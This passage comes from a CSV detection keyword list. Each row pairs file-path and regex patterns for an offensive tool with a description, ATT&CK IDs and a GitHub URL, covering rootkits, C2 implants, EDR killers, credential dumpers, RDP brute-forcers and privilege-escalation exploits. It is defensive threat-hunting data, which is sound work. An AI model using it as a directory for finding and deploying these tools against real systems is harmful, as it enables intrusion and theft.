Access","https://github.com/nidem/kerberoast","1","1","N/A","N/A","10","1352","314","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z" "*/Nidhogg.cpp*",".{0,1000}\/Nidhogg\.cpp.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","1","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*/Nidhogg.exe*",".{0,1000}\/Nidhogg\.exe.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","1","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*/Nidhogg.git*",".{0,1000}\/Nidhogg\.git.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","1","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*/Nidhogg.zip*",".{0,1000}\/Nidhogg\.zip.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","1","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*/NidhoggClient.exe*",".{0,1000}\/NidhoggClient\.exe.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","1","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*/NidhoggClient/*",".{0,1000}\/NidhoggClient\/.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","1","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*/nightCrawler.ps1*",".{0,1000}\/nightCrawler\.ps1.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","1","N/A","9","1","60","9","2024-04-01T07:49:15Z","2023-12-04T07:05:48Z" "*/Nightmangle.git*",".{0,1000}\/Nightmangle\.git.{0,1000}","offensive_tool_keyword","Nightmangle","ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","1","N/A","10","10","117","14","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z" "*/nikto.git*",".{0,1000}\/nikto\.git.{0,1000}","offensive_tool_keyword","nikto","Nikto web server scanner","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/sullo/nikto","1","1","N/A","N/A","10","7885","1156","2024-05-01T02:01:39Z","2012-11-24T04:24:29Z" "*/nikto.pl*",".{0,1000}\/nikto\.pl.{0,1000}","offensive_tool_keyword","nikto","Nikto web scanner tool","T1210.001 - T1190 - T1046 - T1222","TA0007 - TA0002 - TA0001","N/A","N/A","Web Attacks","https://github.com/sullo/nikto","1","1","N/A","N/A","10","7885","1156","2024-05-01T02:01:39Z","2012-11-24T04:24:29Z" "*/nikto.pl*",".{0,1000}\/nikto\.pl.{0,1000}","offensive_tool_keyword","nikto","Nikto web server scanner","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/sullo/nikto","1","1","N/A","N/A","10","7885","1156","2024-05-01T02:01:39Z","2012-11-24T04:24:29Z" "*/NimBlackout*",".{0,1000}\/NimBlackout.{0,1000}","offensive_tool_keyword","NimBlackout","Kill AV/EDR leveraging BYOVD attack","T1562.001 - T1055.001 - T1055.012","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Helixo32/NimBlackout","1","0","N/A","N/A","3","291","38","2023-07-11T07:32:50Z","2023-07-06T18:40:02Z" "*/NimBlackout*",".{0,1000}\/NimBlackout.{0,1000}","offensive_tool_keyword","NimBlackout","Kill AV/EDR leveraging BYOVD attack","T1562.001 - T1055.001 - T1055.012","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Helixo32/NimBlackout","1","0","N/A","N/A","3","291","38","2023-07-11T07:32:50Z","2023-07-06T18:40:02Z" "*/NimBlackout*",".{0,1000}\/NimBlackout.{0,1000}","offensive_tool_keyword","NimBlackout","Kill AV/EDR leveraging BYOVD attack","T1562.001 - T1055.001 - T1055.012","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Helixo32/NimBlackout","1","1","N/A","N/A","3","291","38","2023-07-11T07:32:50Z","2023-07-06T18:40:02Z" "*/NimBlackout*",".{0,1000}\/NimBlackout.{0,1000}","offensive_tool_keyword","NimBlackout","Kill AV/EDR leveraging BYOVD attack","T1562.001 - T1055.001 - T1055.012","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Helixo32/NimBlackout","1","1","N/A","N/A","3","291","38","2023-07-11T07:32:50Z","2023-07-06T18:40:02Z" "*/NimBlackout*",".{0,1000}\/NimBlackout.{0,1000}","offensive_tool_keyword","NimBlackout","Kill AV/EDR leveraging BYOVD attack","T1562.001 - T1055.001 - T1055.012","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Helixo32/NimBlackout","1","1","N/A","N/A","3","291","38","2023-07-11T07:32:50Z","2023-07-06T18:40:02Z" "*/nimcrypt.nim*",".{0,1000}\/nimcrypt\.nim.{0,1000}","offensive_tool_keyword","nimcrypt","Nimcrypt is a .NET PE Crypter written in Nim based entirely on the work of @byt3bl33d3r's OffensiveNim project","T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/icyguider/nimcrypt","1","1","N/A","N/A","1","90","7","2021-03-25T00:27:12Z","2021-03-24T17:51:52Z" "*/nimcrypt/*",".{0,1000}\/nimcrypt\/.{0,1000}","offensive_tool_keyword","nimcrypt","Nimcrypt is a .NET PE Crypter written in Nim based entirely on the work of @byt3bl33d3r's OffensiveNim project","T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/icyguider/nimcrypt","1","1","N/A","N/A","1","90","7","2021-03-25T00:27:12Z","2021-03-24T17:51:52Z" "*/Nimcrypt2*",".{0,1000}\/Nimcrypt2.{0,1000}","offensive_tool_keyword","Nimcrypt2",".NET PE & Raw Shellcode Packer/Loader Written in Nim","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/icyguider/Nimcrypt2","1","1","N/A","N/A","8","707","118","2023-01-20T22:07:15Z","2022-02-23T15:43:16Z" "*/NimDllSideload.git*",".{0,1000}\/NimDllSideload\.git.{0,1000}","offensive_tool_keyword","NimDllSideload","DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/byt3bl33d3r/NimDllSideload","1","1","N/A","9","2","157","17","2022-12-04T21:52:49Z","2022-12-03T03:25:57Z" "*/NimDllSideload/*",".{0,1000}\/NimDllSideload\/.{0,1000}","offensive_tool_keyword","NimDllSideload","DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/byt3bl33d3r/NimDllSideload","1","1","N/A","9","2","157","17","2022-12-04T21:52:49Z","2022-12-03T03:25:57Z" "*/NimExec.git*",".{0,1000}\/NimExec\.git.{0,1000}","offensive_tool_keyword","NimExec","Fileless Command Execution for Lateral Movement in Nim","T1021.006 - T1059.005 - T1564.001","TA0008 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/frkngksl/NimExec","1","1","N/A","N/A","4","357","39","2023-12-12T06:59:59Z","2023-04-21T19:46:53Z" "*/Nimperiments.git*",".{0,1000}\/Nimperiments\.git.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","10","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*/NimPlant.*",".{0,1000}\/NimPlant\..{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*/NimPlant/*",".{0,1000}\/NimPlant\/.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*/nimplants/*",".{0,1000}\/nimplants\/.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*/nimproxydll.git*",".{0,1000}\/nimproxydll\.git.{0,1000}","offensive_tool_keyword","nimproxydll","A Docker container for byt3bl33d3r/NimDllSideload - DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/cyllective/nimproxydll","1","1","N/A","9","1","11","0","2024-03-22T10:29:56Z","2024-03-15T15:15:45Z" "*/nimproxydll/*",".{0,1000}\/nimproxydll\/.{0,1000}","offensive_tool_keyword","nimproxydll","A Docker container for byt3bl33d3r/NimDllSideload - DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/cyllective/nimproxydll","1","1","N/A","9","1","11","0","2024-03-22T10:29:56Z","2024-03-15T15:15:45Z" "*/ninja.crt*",".{0,1000}\/ninja\.crt.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*/Ninja.git*",".{0,1000}\/Ninja\.git.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*/ninja.key*",".{0,1000}\/ninja\.key.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*/Ninja.py*",".{0,1000}\/Ninja\.py.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*/nipe.git",".{0,1000}\/nipe\.git","offensive_tool_keyword","nipe","An engine to make Tor Network your default gateway.","T1560 - T1573 - T1578","TA0005 - TA0007","N/A","N/A","Data Exfiltration","https://github.com/htrgouvea/nipe","1","0","N/A","N/A","10","1833","307","2024-01-28T17:07:21Z","2015-09-07T18:47:10Z" "*/nipe.pl",".{0,1000}\/nipe\.pl","offensive_tool_keyword","nipe","An engine to make Tor Network your default gateway.","T1560 - T1573 - T1578","TA0005 - TA0007","N/A","N/A","Data Exfiltration","https://github.com/htrgouvea/nipe","1","1","N/A","N/A","10","1833","307","2024-01-28T17:07:21Z","2015-09-07T18:47:10Z" "*/nishang*",".{0,1000}\/nishang.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security. penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1027 - T1210.001 - T1055.012 - T1047","TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*/nishang/*",".{0,1000}\/nishang\/.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*/nje-node-brute.nse*",".{0,1000}\/nje\-node\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/nje-pass-brute.nse*",".{0,1000}\/nje\-pass\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/NLBrute*.rar*",".{0,1000}\/NLBrute.{0,1000}\.rar.{0,1000}","offensive_tool_keyword","NLBrute","RDP Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/amazond/NLBrute-1.2","1","1","N/A","10","1","0","1","2023-12-21T12:25:54Z","2023-12-21T12:22:27Z" "*/NLBrute*.zip*",".{0,1000}\/NLBrute.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","NLBrute","RDP Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/amazond/NLBrute-1.2","1","1","N/A","10","1","0","1","2023-12-21T12:25:54Z","2023-12-21T12:22:27Z" "*/NLBrute.exe*",".{0,1000}\/NLBrute\.exe.{0,1000}","offensive_tool_keyword","NLBrute","RDP Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/amazond/NLBrute-1.2","1","1","N/A","10","1","0","1","2023-12-21T12:25:54Z","2023-12-21T12:22:27Z" "*/nmap.py*",".{0,1000}\/nmap\.py.{0,1000}","offensive_tool_keyword","crackmapexec","parser nmap.py from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*/nmap_smb_scan_all_*.txt*",".{0,1000}\/nmap_smb_scan_all_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*/nntp-ntlm-info.nse*",".{0,1000}\/nntp\-ntlm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/NoArgs.exe*",".{0,1000}\/NoArgs\.exe.{0,1000}","offensive_tool_keyword","NoArgs","NoArgs is a tool designed to dynamically spoof and conceal process arguments while staying undetected. It achieves this by hooking into Windows APIs to dynamically manipulate the Windows internals on the go. This allows NoArgs to alter process arguments discreetly.","T1055 - T1574 - T1112 - T1056","TA0005 - TA0040 - TA0009","N/A","N/A","Defense Evasion","https://github.com/oh-az/NoArgs","1","1","N/A","8","2","130","24","2024-03-17T04:43:11Z","2024-03-15T16:54:49Z" "*/NoArgs.git*",".{0,1000}\/NoArgs\.git.{0,1000}","offensive_tool_keyword","NoArgs","NoArgs is a tool designed to dynamically spoof and conceal process arguments while staying undetected. It achieves this by hooking into Windows APIs to dynamically manipulate the Windows internals on the go. This allows NoArgs to alter process arguments discreetly.","T1055 - T1574 - T1112 - T1056","TA0005 - TA0040 - TA0009","N/A","N/A","Defense Evasion","https://github.com/oh-az/NoArgs","1","1","N/A","8","2","130","24","2024-03-17T04:43:11Z","2024-03-15T16:54:49Z" "*/No-Consolation.git*",".{0,1000}\/No\-Consolation\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a Beacon Object File (BOF) that executes unmanaged PEs inline and retrieves their output without allocating a console (i.e spawning conhost.exe)","T1055 - T1129","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/fortra/No-Consolation","1","1","N/A","9","4","317","32","2024-04-08T14:15:00Z","2023-11-06T22:01:42Z" "*/Nofault.exe*",".{0,1000}\/Nofault\.exe.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","474","84","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z" "*/NoFilter.cpp*",".{0,1000}\/NoFilter\.cpp.{0,1000}","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","9","3","283","44","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" "*/NoFilter.exe*",".{0,1000}\/NoFilter\.exe.{0,1000}","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","9","3","283","44","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" "*/NoFilter.git*",".{0,1000}\/NoFilter\.git.{0,1000}","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","9","3","283","44","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" "*/NoFilter.sln*",".{0,1000}\/NoFilter\.sln.{0,1000}","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","9","3","283","44","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" "*/NoFilter.vcxproj*",".{0,1000}\/NoFilter\.vcxproj.{0,1000}","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","9","3","283","44","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" "*/nopac.exe",".{0,1000}\/nopac\.exe","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/ricardojba/noPac","1","0","N/A","N/A","1","34","5","2021-12-19T17:42:12Z","2021-12-13T18:51:31Z" "*/nopac.py*",".{0,1000}\/nopac\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/No-PowerShell.cs*",".{0,1000}\/No\-PowerShell\.cs.{0,1000}","offensive_tool_keyword","No-powershell","powershell script to C# (no-powershell)","T1059.001 - T1027 - T1500","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs","1","1","N/A","8","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*/No-PowerShell.exe*",".{0,1000}\/No\-PowerShell\.exe.{0,1000}","offensive_tool_keyword","No-powershell","powershell script to C# (no-powershell)","T1059.001 - T1027 - T1500","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs","1","1","N/A","8","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*/nopowershell.git*",".{0,1000}\/nopowershell\.git.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*/nopowershell/*",".{0,1000}\/nopowershell\/.{0,1000}","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - 